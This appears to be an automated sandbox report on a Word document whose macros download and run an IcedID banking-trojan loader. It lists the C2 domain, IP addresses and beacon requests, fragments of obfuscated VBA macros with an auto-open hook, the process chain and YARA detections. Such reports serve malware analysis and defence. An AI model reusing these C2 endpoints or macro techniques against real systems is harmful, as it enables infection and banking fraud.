      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global traffic | TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172

      Networking

      Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.108.27 80
      Source: C:\Windows\System32\rundll32.exe | Domain query: alexbionka.com
      Source: Malware configuration extractor | URLs: alexbionka.com
      Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        Connection: Keep-Alive
        Cookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03
        Host: alexbionka.com
      Source: Joe Sandbox View | IP Address: 64.227.108.27 64.227.108.27
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Thu, 11 Aug 2022 15:27:53 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
        X-Powered-By: PHP/7.2.34
        Content-Description: File Transfer
        Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"
        Expires: 0
        Cache-Control: must-revalidate
        Pragma: public
        Content-Length: 360448
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/octet-stream
      Source: global traffic | HTTP traffic detected:
        GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 45.8.146.139
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Thu, 11 Aug 2022 15:28:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
      Source: unknown | TCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146
      Source: r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO651
      Source: rundll32.exe, 00000005.00000002.946500904.0000000000134000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&
      Source: rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma
      Source: r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&
      Source: rundll32.exe, 00000005.00000002.946611241.0000000000504000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com/
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmp
      Source: unknown | DNS traffic detected: queries for: alexbionka.com

      E-Banking Fraud

      Source: Yara match | File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara match | File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      System Summary

      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: Screenshot number: 4 | Screenshot OCR: Enable editing" button on I W a the top bar, and then cIick"Enable content". . 0 e ="F- "" m
      Source: Screenshot number: 4 | Screenshot OCR: Enable content". . 0 e ="F- "" m " " "" " "" " 8==",== " ii; It ' 4#1,1 0 Pa,e, I of
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and is attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group that collects intelligence in support of foreign and security policy decision-making. References:
        https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
        https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
        https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
        https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
        https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
        https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf
        https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
        Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: dodsonimaging,file,08.11.2022.doc | OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: dodsonimaging,file,08.11.2022.doc | OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: dodsonimaging,file,08.11.2022.doc | OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: dodsonimaging,file,08.11.2022.doc | OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_00000001800024FC 5_2_00000001800024FC
Source: dodsonimaging,file,08.11.2022.doc | OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE, VBA macro line: Private Sub Document_Open()
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_00041203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,4_2_00041203
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_00041A33 NtOpenProcessToken,NtClose,4_2_00041A33
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_00041A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,4_2_00041A8C
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_000419E3 NtOpenProcessToken,NtSetInformationToken,NtClose,4_2_000419E3
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF74D5FE6 NtCreateSection,NtMapViewOfSection,5_2_000007FEF74D5FE6
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF74D5FF9 NtCreateSection,5_2_000007FEF74D5FF9
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr | Static PE information: No import functions for PE file found
Source: y84FE.tmp.dll.0.dr | Static PE information: No import functions for PE file found
Source: r8F8A.tmp.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dodsonimaging,file,08.11.2022.doc | OLE indicator, VBA macros: true
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Memory allocated: 77740000 page execute and read and write
Source: dodsonimaging,file,08.11.2022.doc | Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: dodsonimaging,file,08.11.2022.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\dodsonimaging,file,08.11.2022.doc
Source: dodsonimaging,file,08.11.2022.doc | OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR6B5F.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@5/14@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_000414BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,4_2_000414BD
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Command line argument: RunDLL 4_2_00041203
Source: dodsonimaging,file,08.11.2022.doc | OLE document summary: title field not present or empty
Source: dodsonimaging,file,08.11.2022.doc | OLE document summary: author field not present or empty
